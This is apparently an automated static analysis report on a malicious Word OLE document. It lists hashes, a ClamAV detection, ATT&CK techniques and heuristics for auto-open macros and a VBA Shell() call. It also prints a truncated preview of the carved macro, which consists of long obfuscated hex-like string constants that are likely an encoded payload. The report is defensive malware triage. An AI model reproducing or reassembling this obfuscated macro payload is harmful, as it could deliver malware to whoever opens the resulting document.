Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3f3372131de3c6be…

MALICIOUS

Office (OLE)

66.5 KB Created: 2018-03-21 22:24:00 Authoring application: Microsoft Office Word First seen: 2019-01-31
MD5: e648cc9b0f68f1b79e173fe1b6024929 SHA-1: c6695f8c25f51ebf550e1f508a9976b55e1451f5 SHA-256: 3f3372131de3c6be29bea1f745203921c8bf626682963209f8e9bff4ee7d6754
Risk Score: 264

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros, including Document_Open and Workbook_Open auto-execution macros, which is a strong indicator of malicious intent. The critical heuristic firing for a Shell() call in VBA, combined with the presence of the extracted VBA macro file 'macros.bas', suggests that the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics (8)

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20157 bytes
SHA-256: 3c03eeaedb6ec4a7a3e8d2bf76032769ed41b5c5000b13530df9f143e5eb786c
Detection (of the carved artifact itself)
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 69 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' NOTE(review): exported module header of the carved "ThisDocument" class module
' (oletools.olevba extract, see Extracted artifacts). The Attribute lines above are
' VBA export metadata written by the extractor, not statements the macro executes.
' The visible portion of the preview only builds long hex-looking string constants;
' the Document_Open/Workbook_Open handlers and the Shell() call reported by the
' heuristics are not within this excerpt (the preview is truncated) — confirm in the
' full macros.bas.
Option Explicit


Public Sub J_EMZ()
   Dim K_J As String
   Dim YIH_MM As String
   Dim TJ_VTS As String
TJ_VTS = "AFBD8484848484845184846B846184655CB384B0849D848484ABA984AD848484837575719BB684A6A084845584848584848D488484AF7F8484709B9165887F56B99F84BB848484594F8184848484BB848484B98484A384847DC18A7F59808E8484848446848190848484B75684849EBC84A"
Dim WTT_OC As String
WTT_OC = "284846B84848A8484844684798C9184B9845E846DB1846C846C84849EC08484848284848D84848459848461838484B08484844786848484845E84BF6484AC4FB7B584846C848484845D4F89A284848484847484848F848EA381C0848484B184788084535D964F84866D847A846C8484C284"
Dim B_VO As String
B_VO = "7CAC846A849C849F5D60818484B2848484608484846A848467846EAA9846844A84849C845B5984958484844A849A91846BB6BB84847457844847848684845FAC8484848C5B844C4A7D84788484878484848456BB8484845981844672848445A1C3945484B484848484B7B68B84518484C48"
Dim KKT_RL As String
KKT_RL = "486848484845A84844A7D84798487755460849A8484688484AF849090695F84848284848C8484798484848456848484B9846E848484A28484849984598453A084848484BB63668484A78484848484BD84849C83844675A48470978465B884847F80845084B44D848493846C84474C8486A9"
Dim CML_SN As String
CML_SN = "91846284B6AD848484A78484848473B28484B18461938484BB7C846E90508453A05F84A284B6849BC27F8152A4847E8484AC848475AEC28484847684849C8484845584B884A18459A884988484638484A74EA0708460AD84BBB7848484847EC365AB7184BB7A519B849A5F5E84897884798"
Dim XSP_EW As String
XSP_EW = "48484B967BE8462849B8484A2C38484848455B371844A84A1459492778384C45D84B384848984849E7D8484848484BC8484848469758484C48484BE9C84845C84B08A847884849784785A848CC184A9A9848484729F846A84BD84C27E8484B284847F84508884848EBD8460844884A759C4"
Dim VT_Q As String
VT_Q = "778BBA8456A2AF84A85E844A8484848484849E8484849D84AD849661BA84606A4A9C6B6E846E9A8484B584B9B8888491846C74848484AE84624B84845DB98474848478A5C38484A084849D5D848669804A849284AFAF5F845184C40D8384BE848484A284A377849A464D56B07F869B58798"
Dim ZY_LI As String
ZY_LI = "4BB93BA848984B75A53847584846C8484845F845F5D5AAD56847C846084B2B94E8448B262525D728462848484AA8084575B84BD849884A27D52C0AD848484586F8484848484C184848484849D848484AF84498484C084A0847A548484848F68C3845A848C769E84C48451A2848484BA8484"
Dim XJ_DZT As String
XJ_DZT = "608484597A848484845A8A84844C91849E7EAAC48487B49C848499848484AD73AFA1848481844884848484845F8484B184C1BA848484846B74846C7084878484AD8484848484C1848469847F8484C1848484AE4AA0845B8461B2B651B44976848C848484848484936D846B84859884569B8"
Dim K_QJK As String
K_QJK = "484848484848484A4C378847B6584A384844684745F84BA8F84845E84845D58AF84849E484684846E608484849DB184BB84959A758484846CB9848084A9B5846251A884848484466C4A849484848884848484848484847684508459BA84B8848468848384984D8484BFA684A38484848484"
Dim A_P As String
A_P = "9F6E844E84976C8483588598A8789B8484848460B5848584A08484F4494D847C8EAA8480845B845A8497845B7398848F84555884849495668484884CB8848090B3845281658455BD86A084849A898484848484845F928459B084628484B05B8B84778BC46E5F84848484AFA7848C845B848"
Dim H_VR As String
H_VR = "C9B9884576C848484B484BE845384B490B69B84849F8484848484AB816684848484849984789DB87452846E84848484B6AA84848498848484BA5C848484844E844D638C845C5E8484A99D846C84845B5884C0848484A1849CB6BA84738484A884938484B6B084BD4D84927B8484BA844D84"
Dim HPQ_ZC As String
HPQ_ZC = "70849CAA7B8484848461B684879D89B2849F8D55A04F84846B84B28484846A84B78473849A7684848484B58484B5849F568484C1848484A584678E4E8B9084845A847A6D847984B884A48477B58494847EABBE8484A7978484849F848469846984848484B74E8C5E8A717B847384A084865"
Dim ZM_D As String
ZM_D = "1847A718477849C66C0A184847F8453847CBF8484A27784847A6147844CA2A5908484848484849F608484A3778484648469C49B8A84488479C25AC3845F638484A584765B849F8484BAAB848547658984777D84849884849884A48484AC8484848446844E84849856848484BF847F758484"
Dim V_C As String
V_C = "5F845287B6846A848F8489848450C2756484BF78B37D74848468
... (truncated)